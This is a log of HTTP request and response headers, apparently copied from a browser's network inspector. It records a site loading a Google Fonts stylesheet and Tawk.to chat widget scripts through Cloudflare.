User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/css; charset=utf-8
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Tue, 04 Oct 2022 08:23:56 GMT
date: Tue, 04 Oct 2022 08:23:56 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
embed.tawk.to/5c7ac8afa726ff2eea5a47cb/default
104.22.24.131200 OK 0 B URL HTTP/2 embed.tawk.to/5c7ac8afa726ff2eea5a47cb/default
IP 104.22.24.131:0
GET /5c7ac8afa726ff2eea5a47cb/default HTTP/1.1
Host: embed.tawk.to
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://biasbd.com
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
date: Tue, 04 Oct 2022 08:23:58 GMT
content-type: application/x-javascript
access-control-allow-origin: *
cache-control: public, max-age=7200, s-maxage=3600
etag: W/"stable-v4-63258f417d7"
vary: Accept-Encoding
strict-transport-security: max-age=0; includeSubDomains; preload
cf-cache-status: MISS
x-content-type-options: nosniff
server: cloudflare
cf-ray: 754c84b95f5bb4ed-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
fonts.googleapis.com/css?family=PT+Sans%3A400italic%2C400%2C600%2C700%2C300&subset=latin%2Clatin-ext&ver=5.2.16
142.250.74.10200 OK 0 B URL HTTP/2 fonts.googleapis.com/css?family=PT+Sans%3A400italic%2C400%2C600%2C700%2C300&subset=latin%2Clatin-ext&ver=5.2.16
IP 142.250.74.10:0
GET /css?family=PT+Sans%3A400italic%2C400%2C600%2C700%2C300&subset=latin%2Clatin-ext&ver=5.2.16 HTTP/1.1
Host: fonts.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/css; charset=utf-8
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Tue, 04 Oct 2022 08:23:56 GMT
date: Tue, 04 Oct 2022 08:23:56 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
embed.tawk.to/_s/v4/app/63258f417d7/js/twk-chunk-vendors.js
104.22.24.131200 OK 0 B URL HTTP/2 embed.tawk.to/_s/v4/app/63258f417d7/js/twk-chunk-vendors.js
IP 104.22.24.131:0
GET /_s/v4/app/63258f417d7/js/twk-chunk-vendors.js HTTP/1.1
Host: embed.tawk.to
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://biasbd.com
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Tue, 04 Oct 2022 08:23:59 GMT
content-type: application/javascript
last-modified: Sat, 17 Sep 2022 09:12:03 GMT
etag: W/"81c2642aac0b88b6b237d279f5f8ce67"
access-control-allow-origin: *
cache-control: public, max-age=2592000, immutable
x-cache-status: HIT
strict-transport-security: max-age=0; includeSubDomains; preload
cf-cache-status: MISS
vary: Accept-Encoding
x-content-type-options: nosniff
server: cloudflare
cf-ray: 754c84c0990bb4ed-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2